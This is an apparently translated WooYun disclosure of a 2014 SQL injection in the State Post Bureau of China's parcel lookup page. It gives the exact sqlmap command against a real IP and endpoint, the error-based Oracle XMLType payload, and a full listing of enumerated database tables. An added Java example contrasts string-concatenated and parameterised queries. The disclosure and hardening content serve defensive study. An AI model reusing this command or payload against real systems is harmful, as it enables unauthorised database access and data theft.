Vulnerability details

Disclosure status:

2014-03-10: Details reported to the vendor; awaiting vendor handling
2014-03-15: Vendor has confirmed; details disclosed to the vendor only
2014-03-25: Details disclosed to core white hats and domain experts
2014-04-04: Details disclosed to regular white hats
2014-04-14: Details disclosed to intern white hats
2014-04-24: Details disclosed to the public

Brief description:

State Post Bureau of the People's Republic of China: SQL injection, verified with sqlmap

Detailed description:

http://www.spb.gov.cn/folder9/folder2047/index.html

The parcel lookup function

[screenshot: normal01.png]

[screenshot: normal02.png]



Then sqlmap was used to try enumerating the tables:

C:\Users\Administrator>sqlmap.py -u "219.141.228.193:8080/express/maincheck_pk.jsp" --data="radiobutton=2&addr1=a&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1" --tables

sqlmap identified the following injection points with a total of 46 HTTP(s) requests:
---
Place: POST
Parameter: addr1
Type: error-based
Title: Oracle OR error-based - WHERE or HAVING clause (XMLType)
Payload: radiobutton=2&addr1=-8379') OR 8359=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(105)||CHR(97)||CHR(113)||(SELECT (CASE WHEN (8359=8359) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(116)||CHR(103)||CHR(113)||CHR(62))) FROM DUAL) AND ('TFti'='TFti&addr2=d&kg=10&SS1=%B2%E9%D1%AF%D7%CA%B7%D1
---
web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table]
+--------------------------------+
| RLM$PARSEDCOND |
+--------------------------------+

Database: OLAPSYS
[9 tables]
+--------------------------------+
| CWM2$AWCUBECREATEACCESS |
| CWM2$AWDIMCREATEACCESS |
| CWM2$_AW_NEXT_TEMP_CUST_MEAS |
| CWM2$_AW_TEMP_CUST_MEAS_MAP |
| CWM2$_TEMP_VALUES |
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |
| XML_LOAD_LOG |
| XML_LOAD_RECORDS |
+--------------------------------+

Database: EXPRESS
[38 tables]
+--------------------------------+
| F_AREAMEM_IN |
| F_AREAMEM_IN_HIS |
| F_AREAMEM_IN_TEM |
| F_AREAMEM_OUT |
| F_AREAMEM_OUT_HIS |
| F_AREAMEM_OUT_TEM |
| F_AREAMEM_OUT__ |
| F_AREA_IN |
| F_AREA_IN_HIS |
| F_AREA_IN_TEM |
| F_AREA_OUT |
| F_AREA_OUT_HIS |
| F_AREA_OUT_TEM |
| F_ARRAY |
| F_ARRAY_HIS |
| F_ARRAY_TEM |
| F_CPY |
| F_PROD |
| LOG_EXPRESS |
| LOG_EXPRESS_STAT |
| LOG_PACKAGE |
| LOG_PACKAGE_STAT |
| LOG_SYS_OPT |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PC2DIST |
| PK_AREAMEM |
| PK_AREAS |
| PK_ARRAY |
| S_CITY |
| S_DIST |
| S_FIELDVALUE |
| S_PROV |
| S_QUERY_TYPE |
| TEST |
+--------------------------------+

Database: SYSTEM
[8 tables]
+--------------------------------+
| DEF$_TEMP$LOB |
| HELP |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARTITION |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+

Database: SYS
[30 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| AW$AWCREATE |
| AW$AWCREATE10G |
| AW$AWMD |
| AW$AWREPORT |
| AW$AWXML |
| AW$EXPRESS |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| OLAPI_HISTORY |
| OLAPI_IFACE_OBJECT_HISTORY |
| OLAPI_IFACE_OP_HISTORY |
| OLAPI_MEMORY_HEAP_HISTORY |
| OLAPI_MEMORY_OP_HISTORY |
| OLAPI_SESSION_HISTORY |
| OLAPTABLEVELS |
| OLAPTABLEVELTUPLES |
| OLAP_OLEDB_FUNCTIONS_PVT |
| OLAP_OLEDB_KEYWORDS |
| OLAP_OLEDB_MDPROPS |
| OLAP_OLEDB_MDPROPVALS |
| PLAN_TABLE$ |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
+--------------------------------+

Database: MDSYS
[36 tables]
+--------------------------------+
| OGIS_GEOMETRY_COLUMNS |
| OGIS_SPATIAL_REFERENCE_SYSTEMS |
| SDO_COORD_AXES |
| SDO_COORD_AXIS_NAMES |
| SDO_COORD_OPS |
| SDO_COORD_OP_METHODS |
| SDO_COORD_OP_PARAMS |
| SDO_COORD_OP_PARAM_USE |
| SDO_COORD_OP_PARAM_VALS |
| SDO_COORD_OP_PATHS |
| SDO_COORD_REF_SYS |
| SDO_COORD_SYS |
| SDO_CS_SRS |
| SDO_DATUMS |
| SDO_DATUMS_OLD_SNAPSHOT |
| SDO_ELLIPSOIDS |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT |
| SDO_GEOR_PLUGIN_REGISTRY |
| SDO_GEOR_XMLSCHEMA_TABLE |
| SDO_GR_MOSAIC_0 |
| SDO_GR_MOSAIC_1 |
| SDO_GR_MOSAIC_2 |
| SDO_GR_MOSAIC_3 |
| SDO_GR_RDT_1 |
| SDO_PREFERRED_OPS_SYSTEM |
| SDO_PREFERRED_OPS_USER |
| SDO_PRIME_MERIDIANS |
| SDO_PROJECTIONS_OLD_SNAPSHOT |
| SDO_TOPO_DATA$ |
| SDO_TOPO_RELATION_DATA |
| SDO_TOPO_TRANSACT_DATA |
| SDO_TXN_IDX_DELETES |
| SDO_TXN_IDX_EXP_UPD_RGN |
| SDO_TXN_IDX_INSERTS |
| SDO_UNITS_OF_MEASURE |
| SDO_XML_SCHEMAS |
+--------------------------------+

Database: CTXSYS
[3 tables]
+--------------------------------+
| DR$NUMBER_SEQUENCE |
| DR$OBJECT_ATTRIBUTE |
| DR$POLICY_TAB |
+--------------------------------+

Database: WMSYS
[4 tables]
+--------------------------------+
| WM$NEXTVER_TABLE |
| WM$VERSION_HIERARCHY_TABLE |
| WM$VERSION_TABLE |
| WM$WORKSPACES_TABLE |
+--------------------------------+


Proof of vulnerability:

The sqlmap run and the resulting table listing are the same as those shown in the detailed description above.

Fix:

Just shut the post office down, and take unnecessary websites offline.
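The report's remediation is to take the site offline; the actual defect is that form fields such as addr1 reach the Oracle query as concatenated SQL text, which is why the error-based XMLType payload above works. The following is an added example, not code from the spb.gov.cn application (whose source is not shown): a hypothetical lookup written the vulnerable way beside the parameterised JDBC form. PK_AREAS is a table name from the sqlmap listing; the column names ADDR1, ADDR2 and FEE and the input pattern are assumptions.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class PostageLookup {

    // Vulnerable pattern (hypothetical reconstruction of what the report implies):
    // the form values are spliced into the SQL string, so a value like
    //   -8379') OR 8359=(SELECT ... FROM DUAL) AND ('TFti'='TFti
    // closes the quoted literal and rewrites the WHERE clause.
    // Column names ADDR1/ADDR2/FEE are assumptions; PK_AREAS is from the report.
    static String lookupFeeUnsafe(Connection c, String addr1, String addr2) throws SQLException {
        String sql = "SELECT FEE FROM PK_AREAS WHERE (ADDR1='" + addr1
                   + "' AND ADDR2='" + addr2 + "')";
        try (Statement st = c.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            return rs.next() ? rs.getString(1) : null;
        }
    }

    // Hardened form: bind variables keep the statement text fixed, so the
    // submitted value is only ever compared as data and never parsed as SQL.
    static String lookupFeeSafe(Connection c, String addr1, String addr2) throws SQLException {
        String sql = "SELECT FEE FROM PK_AREAS WHERE ADDR1 = ? AND ADDR2 = ?";
        try (PreparedStatement ps = c.prepareStatement(sql)) {
            ps.setString(1, addr1);
            ps.setString(2, addr2);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() ? rs.getString(1) : null;
            }
        }
    }

    // Defence in depth: a region name is short and alphanumeric, so reject
    // anything else before it reaches the database. The pattern is an
    // assumption about the expected input, not a substitute for binding.
    static boolean isPlausibleRegion(String s) {
        return s != null && s.length() <= 32 && s.matches("[\\p{L}\\p{N} ]+");
    }

    // Two further controls the report's output points to: the error-based
    // technique depends on ORA- error text being returned to the client, so
    // the JSP should return a generic error page; and the web account should
    // hold only the privileges the EXPRESS schema needs, so that a single
    // injectable parameter cannot be used to walk every schema on the server.
}
```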

Copyright notice: when reposting, please credit the source lxj616@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2014-03-15 20:38

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded by CNCERT to a national information security coordination body.

Latest status:

None yet


Vulnerability rating: